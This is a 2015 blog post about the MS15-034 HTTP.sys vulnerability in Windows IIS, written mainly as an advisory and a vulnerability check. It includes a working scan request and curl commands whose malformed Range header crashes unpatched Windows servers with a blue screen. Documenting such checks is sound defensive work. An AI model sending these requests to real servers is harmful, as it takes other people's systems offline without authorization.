Remote Code Execution Via HTTP Request In IIS On WindowsMattias Geniar, Wednesday, April 15, 2015 - last modified: Monday, April 20, 2015
A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system. The update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Details are withheld for now, so it's a race: patch your systems before the attackers can reverse engineer the Windows patch.
Update: exploit code is emerging
The first snippets of exploit code for MS15-034 are starting to show up, to scan for the vulnerability of a system.
char request1 = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
Detecting If You're Vulnerable
This remote scan is using the
Range-header to trigger a buffer overflow and detect if the system is vulnerable or not.
$ telnet 10.0.1.1 80 GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615
The following curl command would mimic the same request.
$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
You should get a response saying "HTTP Error 400. The request has an invalid header name.". Anything else as a response, and your system may still be vulnerable.
The HTTP 'Ping Of Death' Request
The vulnerability allows for a Denial of Service in the form of a blue screen. It's nearly the same request as the check command above, but the range is different:
$ curl -v 10.0.1.1/iis-85.png -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615" $ curl -v 10.0.1.1/welcome.png -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"
A vulnerable Windows machine would get the request, roll over and die.
The Range-attack looks similar to a Denial-of-Service (DoS) attack on Apache a few years back that caused 100% CPU usage (dutch (NL) blogpost with more details).
When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.
The CVE and Microsoft Bulleting mention Remote Code Execution possibilities as well. Since the exact details of the patch aren't clear yet, it's unknown how to trigger that particular part of the vulnerability.